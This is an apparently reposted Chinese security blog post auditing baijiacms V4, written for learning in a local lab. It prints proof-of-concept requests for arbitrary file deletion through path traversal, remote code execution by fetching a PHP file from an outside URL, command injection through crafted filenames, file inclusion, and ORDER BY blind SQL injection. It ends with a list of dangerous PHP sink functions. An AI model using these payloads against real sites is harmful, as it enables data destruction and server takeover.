baijiacmsV4代码审计!
共 4760字,需浏览 10分钟
· 2021-09-25
作者: 编辑:白帽子社区运营团队
"白帽子社区在线CTF靶场BMZCTF,欢迎各位在这里练习、学习,BMZCTF全身心为网络安全赛手提供优质学习环境,链接(http://www.bmzclub.cn/)
"
这个在此之前有大佬挖过了!最近学习代码审计!再来学习学习!🐱🚀
先熟悉下代码结构!
代码结构
addons 插件
api 接口
assets 静态文件
attachment 上传目录
cache 缓存目录
config 系统配置文件
include 系统文件
system 后端代码
![](https://filescdn.proginn.com/f8c1c5e2c822e800d5a4719a5ed92f6a/cae8e9e3da2940c445c3429e4267b9de.webp)
![](https://filescdn.proginn.com/b0705cb77ebacba306a2220eaa54d934/ce72ca2608789d2ecce16a7841c1f69c.webp)
个人将他们分成两部分!
一部分是 system
本身!另一部分是eshop
!
![](https://filescdn.proginn.com/c6fc9b5f91c42efddebc8f05380b0b1d/e9c40ddfa63e14531d1827628ec9f839.webp)
漏洞复现
任意文件删除
不需要admin
权限
漏洞文件位置:
/system/eshop/core/mobile/util/uploader.php
![](https://filescdn.proginn.com/2a8a137e931b528180040e4377cc9e79/fc7159fd91b48825e39e4dbe5eea5463.webp)
![](https://filescdn.proginn.com/73a6de601d06f1b3e13633d4bc51ba46/4c289d761e55f9e9e8ad8f57458ca82d.webp)
![](https://filescdn.proginn.com/74e3ca15e6cae9f45900842d38876366/c661a6408ef58584c677e3e1b28ea7c5.webp)
看上图应该可以知道$operation
$file
都可控!
跟进一下:file_delete()
![](https://filescdn.proginn.com/238a2fee2873e23a251585f36f99a855/651bcb1044e4369e5b182523beea6152.webp)
![](https://filescdn.proginn.com/bc7161f1648879212d2d352b3fb11f30/2ee1221002ea6061d35eed9172d5fa07.webp)
$settings返回是空的!那就可以容易文件删除了!
![](https://filescdn.proginn.com/0915fbbbea84b2cbd624ca37cf5e3ce3/8527ea69b6ac4ff1855a733c9be90c28.webp)
poc
/index.php?mod=mobile&act=uploader&op=post&do=util&m=eshop&op=remove&file=../flag.txt
调试一下:
![](https://filescdn.proginn.com/ebaa9ed7b38538ff70b6aab85bf742db/51e735d4eb7bbb4279e3ae59c873bf0c.webp)
看到直接跳过了!
![](https://filescdn.proginn.com/98db4c2b589b16eb9a133617c27b74e9/a35e4856e5cf15d3840089200629159e.webp)
![](https://filescdn.proginn.com/3f5a6788e58ee2755be00cea4dd48dd8/8250dfe83db014b9768bab1c2a338c7c.webp)
flag.txt已经删除了!
任意路径删除
需要后台权限!
system/manager/class/web/database.php
![](https://filescdn.proginn.com/d2479d5ad785609fd22331ab1cbd2e91/4c3c17a35d3706f77483bf181765a7ab.webp)
这点很好看!就判断了下 目录是否存在!然后删除目录!
![](https://filescdn.proginn.com/cffd87ba2184add0155da441df5adc98/e63b6cb505f4204cdb78285f4467d3b5.webp)
poc
/index.php?mod=site&act=manager&do=database&op=delete&id=Li8uLi8uLi90ZXRl
删除后:
![](https://filescdn.proginn.com/5d1a572e3f4d4e270cdc93e8c04f0fda/3f1c7b4ef9ce69fb797ad3c9fa0da01e.webp)
![](https://filescdn.proginn.com/3ae00bf3e6f89592ca75a20a4de4ede3/72349f60334581a80d495beb391cd363.webp)
后台RCE
漏洞文件:后台的:
/system/public/class/web/file.php
![](https://filescdn.proginn.com/b84c3a0483c41cf1f7c473d9e1cb627b/0e87c94be936c774dcee104c9c62b64d.webp)
![](https://filescdn.proginn.com/96a21188c39789b282396650eade906a/92b2d53e7925e20e04fef713b61cfd4a.webp)
poc
/index.php?mod=site&act=public&do=file&op=fetch&url=http://xxx.xxxx.xxxx/aaa/1.php
![](https://filescdn.proginn.com/0c2eabffec02c3ec5652770e3623e091/ba27b2b6a4b2a3b06846af60ccf000a8.webp)
写入成功:
![](https://filescdn.proginn.com/f0bac9eadffd1be2783ed141e376075d/172eaede217f1cc47b02986820f4b5ef.webp)
RCE
漏洞文件
/system/weixin/class/web/setting.php
![](https://filescdn.proginn.com/eddf8627950cd54ad19f0d810aa4af77/c008f549739ac57b77b56dddce547659.webp)
![](https://filescdn.proginn.com/13c9f0abd8fdb56dbffd1116147d314e/6d18b06f8723d89373310787e8db5f7d.webp)
$file_full_path直接传进了system!我们可以通过构造文件名来RCE!
![](https://filescdn.proginn.com/fceed5b8967ba64535efb466de183d6b/fd00bc93dc332879aa7fb29b662b1878.webp)
但是image_compress_openscale
是空!我们设置一下缩放!
![](https://filescdn.proginn.com/e8a1b502399268466a01a266b709dcc9/00735bba2037b4084312541fcab1a6cd.webp)
设置完后:
![](https://filescdn.proginn.com/33f3c2d6fcbc99682aafac4518ae7937/10667766e53011248714500682ddcdef.webp)
我自己添加了个$a!来更清晰看出值!
![](https://filescdn.proginn.com/7edd72eb8b10fb26675d0d6a6fc235b4/820887e7026c53d2a7867e33578fa459.webp)
poc
convert -quality 80
D:/phpstudy_pro/WWW/baijiacms_v4_1_4_20170105(2)/;calc;.txt #
D:/phpstudy_pro/WWW/baijiacms_v4_1_4_20170105 (2)/;calc;.txt #
![](https://filescdn.proginn.com/cd78f062e201d854f4eacbd5dc26ad8d/0ec3c176efff06348eda0f8d2e4defca.webp)
但是出了意外!🐱🚀
![](https://filescdn.proginn.com/e603d4340b2d1eca7e9502706d985850/803f1bffe3ecaa7607aa8b9ea5e3c68e.webp)
识别了分号了!
换成其它的管道符就行!
poc2
convert -quality 80
D:/phpstudy_pro/WWW/baijiacms_v4_1_4_20170105 (2)/&calc;.txt #.txt
D:/phpstudy_pro/WWW/baijiacms_v4_1_4_20170105 (2)/&calc;.txt #.txt
数线也不行!可能文件file_move
出问题了!
![](https://filescdn.proginn.com/f5d79ba08a499e40bf86dd4de3451b9b/0184271c117a0b2132c269a3453b05ef.webp)
拓展
再看看有没有可以挖的洞!
任意文件删除
poc
system/eshop/core/web/shop/category.php
文件里也有:file_delete方法!而且thumb_old可控!就看怎么到这里就行了!
![](https://filescdn.proginn.com/43a2294eb13e737afc0d2b274d86cb08/2fa4c14968898e2a84048079ae2dcee7.webp)
关键绕过checksubmit
函数!
![](https://filescdn.proginn.com/ee0248228780de069189257bf7417eb0/0bd0942fbc1c1b6e55144c3c21d7fa6e.webp)
保证 $_CMS['isajax']
存在就行!
![](https://filescdn.proginn.com/242f0e91b08976820412ba5f8b55b46d/90f3e87cda35f564153ad87f11211b28.webp)
全局一下:extends.inc.php
![](https://filescdn.proginn.com/10615527bd434c9d18d487f1d5b31424/d4f40f0f1e150e2340b0e705ccc2b0fb.webp)
这就很easy了!
poc
POST /index.php?mod=site&do=shop&act=category&m=eshop&op=post&submit=1&id=1111&catename=aaaaaa&thumb_old=../flag.txt HTTP/1.1
Host: upload.top
Content-Length: 31
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://upload.top
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://upload.top/index.php?mod=site&do=shop&act=category&m=eshop&op=post&submit=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: __fileupload_type=image; __fileupload_dest_dir=; __fileupload_global=; XDEBUG_SESSION=PHPSTORM; PHPSESSID=1111
Connection: close
{"a":1,"b":2,"c":3,"d":4,"e":5}
![](https://filescdn.proginn.com/127f0e156c212017032ef2b11df580a9/bc98d2c1764eb56ae54b1378dcf5a522.webp)
删除成功!🐱👓
![](https://filescdn.proginn.com/9bedf18bb4bbe533d32d0e7270297242/6a8595278479030793933f9aae8150cf.webp)
文件包含
include $file;
![](https://filescdn.proginn.com/aee8581cab7f7a86d26823e93016fd6b/241351bbcb4a1805497bb245559186b4.webp)
poc
/index.php?mod=site&do=shop&act=../../core&m=eshop
利用条件必须是php
结尾的文件!还要知道php
文件名和位置!
就要早早能不能写入了!
sql
注入
system/eshop/core/mobile/goods/index.php
全局对单引号有过滤!
但是这里有个orderby
注入!
有点小问题:
基于时间的盲注
payload
order by if(1=1,1,sleep(1))
测试结果
select * from ha order by if(1=1,1,sleep(1)); #正常时间
select * from ha order by if(1=2,1,sleep(1)); #有延迟
测试的时候发现延迟的时间并不是sleep(1)中的1秒,而是大于1秒。最后发现延迟的时间和所查询的数据的条数是成倍数关系的。计算公式:
延迟时间=sleep(1)的秒数*所查询数据条数
我所测试的ha表中有五条数据,所以延迟了5秒。如果查询的数据很多时,延迟的时间就会很长了。在写脚本时,可以添加timeout这一参数来避免延迟时间过长这一情况。(当表里只有一条数据的时候不延迟)
poc
/index.php?mod=mobile&do=goods&act=index&m=eshop&op=get_list&order=111&random=1
文章:
[https://xz.aliyun.com/t/9955#toc-0](https://xz.aliyun.com/t/9955#toc-0)
[https://www.wrpzkb.cn/rce/](https://www.wrpzkb.cn/rce/)
[https://yang1k.github.io/post/sql%E6%B3%A8%E5%85%A5%E4%B9%8Border-by%E6%B3%A8%E5%85%A5/#%E5%9F%BA%E4%BA%8E%E6%97%B6%E9%97%B4%E7%9A%84%E7%9B%B2%E6%B3%A8](https://yang1k.github.io/post/sql%E6%B3%A8%E5%85%A5%E4%B9%8Border-by%E6%B3%A8%E5%85%A5/#%E5%9F%BA%E4%BA%8E%E6%97%B6%E9%97%B4%E7%9A%84%E7%9B%B2%E6%B3%A8)
发现个有趣的
php 5 7 都可以!
{eval('echo 111;');} {}我记得以前刚开始学代码的时候老师说过就是一种格式!里面可以放php各种东西!👀
的 我看了看手册理解的里面是当成可变变量了!就和$$a一样的意思!只不过写成 ${$a}
![](https://filescdn.proginn.com/cc83bef1fac0396c544eebd5837f7038/8632c311fe29d83b2f095eb5f1ea2a34.webp)
搜索关键函数:
命令注入
system、exec、passthru、``、shell_exec、
popen、proc_open、pcntl_exec
跨站脚本
echo、print、printf、vprintf、<%=$test%>
文件包含
include、include_once、require、require_once、
show_source、highlight_file、readfile、file_get_contents、fopen、 nt>file
代码注入
eval、preg_replace+/e、assert、call_user_func、
call_user_func_array、create_function
SQL 注入
insert、delete、update、
select
文件管理
copy、rmdir、unlink、delete、fwrite、
chmod、fgetc、fgetcsv、fgets、fgetss、file、file_get_contents、fread、readfile、ftruncate、
file_put_contents、fputcsv、fputs,
文件上传
move_uploaded_file
popen
无回显的!
![](https://filescdn.proginn.com/899d47a626a862ba9b70ceaa3401cd85/46135b4b623f5bf54d25394c24d1cc97.webp)
preg_replace
![](https://filescdn.proginn.com/142ead3e02330a8a95ad09b2c1d60793/ad561e28a8ab006e74f8abcc4b9766af.webp)
call_user_func
![](https://filescdn.proginn.com/18c18eb74396e3b2a23e4fede03d053c/a031440bed90c16e12af70008d1bbb45.webp)
assert
![](https://filescdn.proginn.com/aeeba8ff60e34c79ac2fe0d33545e705/d0f55dcb4e1526d3e755ca0be9f42113.webp)
call_user_func_array
![](https://filescdn.proginn.com/be9f9b08d130f5f3bf36957a88d989f6/cd5307bf6cd9ce3c421bacd344657f7b.webp)